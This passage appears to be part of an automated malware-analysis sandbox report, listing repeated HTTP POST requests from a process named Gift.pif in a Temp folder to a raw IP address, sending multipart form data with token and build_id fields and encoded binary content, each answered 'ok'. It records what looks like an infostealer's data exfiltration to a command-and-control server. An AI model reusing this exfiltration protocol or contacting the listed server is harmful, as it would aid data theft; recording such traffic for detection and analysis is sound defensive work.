                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 32481
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:35 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------AAKEGIJEHJDGDHJKJKKJCont
                                                                        2024-08-05 16:56:35 UTC16126OUTData Raw: 46 73 61 58 70 6c 51 32 46 73 62 47 4a 68 59 32 74 42 63 6e 4a 68 65 51 41 41 56 51 42 58 5a 48 4e 54 5a 58 52 31 63 45 78 76 5a 30 31 6c 63 33 4e 68 5a 32 56 58 41 46 59 41 56 32 52 7a 55 33 56 69 63 32 4e 79 61 57 4a 6c 52 58 67 41 41 41 4d 41 51 32 39 75 63 33 52 79 64 57 4e 30 55 47 46 79 64 47 6c 68 62 45 31 7a 5a 31 5a 58 41 41 51 41 51 33 56 79 63 6d 56 75 64 45 6c 51 41 46 64 45 55 30 4e 50 55 6b 55 75 5a 47 78 73 41 47 34 45 55 6e 52 73 53 57 35 70 64 46 56 75 61 57 4e 76 5a 47 56 54 64 48 4a 70 62 6d 63 41 41 4a 38 42 54 6e 52 50 63 47 56 75 52 6d 6c 73 5a 51 41 41 62 6e 52 6b 62 47 77 75 5a 47 78 73 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                        Data Ascii: FsaXplQ2FsbGJhY2tBcnJheQAAVQBXZHNTZXR1cExvZ01lc3NhZ2VXAFYAV2RzU3Vic2NyaWJlRXgAAAMAQ29uc3RydWN0UGFydGlhbE1zZ1ZXAAQAQ3VycmVudElQAFdEU0NPUkUuZGxsAG4EUnRsSW5pdFVuaWNvZGVTdHJpbmcAAJ8BTnRPcGVuRmlsZQAAbnRkbGwuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                        2024-08-05 16:56:36 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.2.549736188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:36 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 4421
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:36 UTC4421OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------IDHIEBAAKJDHIECAAFHCCont
                                                                        2024-08-05 16:56:37 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:37 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.2.549737188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:37 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 2449
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:37 UTC2449OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------IDHIEBAAKJDHIECAAFHCCont
                                                                        2024-08-05 16:56:38 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        25192.168.2.549738188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:38 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHID
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 6533
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:38 UTC6533OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------IJKKKFCFHCFIECBGDHIDCont
                                                                        2024-08-05 16:56:39 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:38 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:39 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        26192.168.2.549739188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:39 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDB
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 3269
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:39 UTC3269OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------DBFBFBGDBKJJKFIEHJDBCont
                                                                        2024-08-05 16:56:40 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:39 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:40 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        27192.168.2.549740188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:40 UTC327OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----BFHIJEBKEBGHIDHJKJEG
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 11445
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:40 UTC11445OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 49 4a 45 42 4b 45 42 47 48 49 44 48 4a 4b 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 49 4a 45 42 4b 45 42 47 48 49 44 48 4a 4b 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 49 4a 45 42 4b 45 42 47 48 49 44 48 4a 4b 4a 45 47 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------BFHIJEBKEBGHIDHJKJEGContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------BFHIJEBKEBGHIDHJKJEGContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------BFHIJEBKEBGHIDHJKJEGCont
                                                                        2024-08-05 16:56:41 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        28192.168.2.549741188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:41 UTC327OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----BFHIJEBKEBGHIDHJKJEG
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 11449
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:41 UTC11449OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 49 4a 45 42 4b 45 42 47 48 49 44 48 4a 4b 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 49 4a 45 42 4b 45 42 47 48 49 44 48 4a 4b 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 49 4a 45 42 4b 45 42 47 48 49 44 48 4a 4b 4a 45 47 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------BFHIJEBKEBGHIDHJKJEGContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------BFHIJEBKEBGHIDHJKJEGContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------BFHIJEBKEBGHIDHJKJEGCont
                                                                        2024-08-05 16:56:42 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:42 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        29192.168.2.549742188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:42 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJ
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 4277
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:42 UTC4277OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------FHDAEHDAKECGCAKFCFIJContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------FHDAEHDAKECGCAKFCFIJContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------FHDAEHDAKECGCAKFCFIJCont
                                                                        2024-08-05 16:56:43 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:43 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        30192.168.2.549743188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:43 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJ
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 4273
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:43 UTC4273OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------FHDAEHDAKECGCAKFCFIJContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------FHDAEHDAKECGCAKFCFIJContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------FHDAEHDAKECGCAKFCFIJCont
                                                                        2024-08-05 16:56:44 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:44 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:44 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        31192.168.2.549744188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:44 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJ
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 4317
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:44 UTC4317OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 4a 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------FHDAEHDAKECGCAKFCFIJContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------FHDAEHDAKECGCAKFCFIJContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------FHDAEHDAKECGCAKFCFIJCont
                                                                        2024-08-05 16:56:45 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:45 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:45 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.549745188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:45 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIII
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 1977
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
